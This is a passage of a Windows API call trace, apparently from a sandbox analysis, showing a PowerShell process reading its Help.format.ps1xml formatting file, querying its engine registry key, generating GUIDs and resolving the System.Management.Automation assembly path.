	[0671.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0671.665] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x3f05ccfb, Data2=0x8d87, Data3=0x4d85, Data4=([0]=0x83, [1]=0x89, [2]=0x25, [3]=0x98, [4]=0x5b, [5]=0x74, [6]=0xa4, [7]=0x91))) returned 0x0
	[0671.666] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x7dc49ce2, Data2=0x1cb6, Data3=0x425f, Data4=([0]=0x84, [1]=0xf0, [2]=0xf4, [3]=0xb2, [4]=0xdb, [5]=0x87, [6]=0x4a, [7]=0xfa))) returned 0x0
	[0671.666] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x42e567f7, Data2=0x18a8, Data3=0x4d8b, Data4=([0]=0xba, [1]=0xbc, [2]=0x35, [3]=0x97, [4]=0x46, [5]=0x1d, [6]=0xe3, [7]=0x30))) returned 0x0
	[0671.666] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x62701b73, Data2=0x574d, Data3=0x44f7, Data4=([0]=0x87, [1]=0xa9, [2]=0x94, [3]=0x9a, [4]=0x2c, [5]=0x4f, [6]=0x35, [7]=0xef))) returned 0x0
	[0671.666] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0671.666] GetFileType (hFile=0x308) returned 0x1
	[0671.666] SetErrorMode (uMode=0x1) returned 0x1
	[0671.666] GetFileType (hFile=0x308) returned 0x1
	[0671.667] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.667] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.668] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.668] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.328] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.328] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.328] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.328] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.330] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.330] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.331] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.331] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.331] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.332] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.332] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.333] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.336] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.336] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.336] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.337] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.337] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.337] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.338] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.338] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.338] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.339] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.339] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.339] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.340] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.340] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.340] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.341] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.345] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.346] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.346] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.346] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.347] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.347] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.347] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.348] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.348] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.348] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.349] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.349] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.349] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.350] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.350] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.350] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.351] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.351] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.351] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.352] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.352] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.352] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.353] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.353] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.353] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.354] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.354] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.354] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.355] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.355] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0673.355] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0xf37, lpOverlapped=0x0) returned 1
	[0673.356] ReadFile (in: hFile=0x308, lpBuffer=0x34aa9df, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34aa9df*, lpNumberOfBytesRead=0x26cef8*=0x0, lpOverlapped=0x0) returned 1
	[0673.356] ReadFile (in: hFile=0x308, lpBuffer=0x34ab340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cef8, lpOverlapped=0x0 | out: lpBuffer=0x34ab340*, lpNumberOfBytesRead=0x26cef8*=0x0, lpOverlapped=0x0) returned 1
	[0673.356] CloseHandle (hObject=0x308) returned 1
	[0673.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0673.356] SetErrorMode (uMode=0x1) returned 0x1
	[0673.356] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26cea0 | out: lpFileInformation=0x26cea0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0673.357] SetErrorMode (uMode=0x1) returned 0x1
	[0673.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0673.357] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26cf88 | out: phkResult=0x26cf88*=0x308) returned 0x0
	[0673.357] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cf0c, lpData=0x0, lpcbData=0x26cf08*=0x0 | out: lpType=0x26cf0c*=0x1, lpData=0x0, lpcbData=0x26cf08*=0x56) returned 0x0
	[0673.357] CoTaskMemAlloc (cb=0x5a) returned 0x1b8634a0
	[0673.357] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cedc, lpData=0x1b8634a0, lpcbData=0x26ced8*=0x56 | out: lpType=0x26cedc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26ced8*=0x56) returned 0x0
	[0673.357] CoTaskMemFree (pv=0x1b8634a0) 
	[0673.357] RegCloseKey (hKey=0x308) returned 0x0
	[0673.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0673.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0674.839] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x82ecb807, Data2=0x7dde, Data3=0x4ec3, Data4=([0]=0x8c, [1]=0x37, [2]=0xb6, [3]=0x66, [4]=0xfa, [5]=0x99, [6]=0xea, [7]=0xd4))) returned 0x0
	[0674.840] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x4037acac, Data2=0x758d, Data3=0x4deb, Data4=([0]=0x82, [1]=0xe6, [2]=0xa, [3]=0xbf, [4]=0x57, [5]=0xfa, [6]=0xc4, [7]=0xd6))) returned 0x0
	[0674.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0674.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0674.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0674.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.666] CoCreateGuid (in: pguid=0x26d1b0 | out: pguid=0x26d1b0*(Data1=0x639dd116, Data2=0x2528, Data3=0x405a, Data4=([0]=0xab, [1]=0xdd, [2]=0x30, [3]=0xb9, [4]=0xbe, [5]=0x12, [6]=0x3a, [7]=0x1f))) returned 0x0
	[0676.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
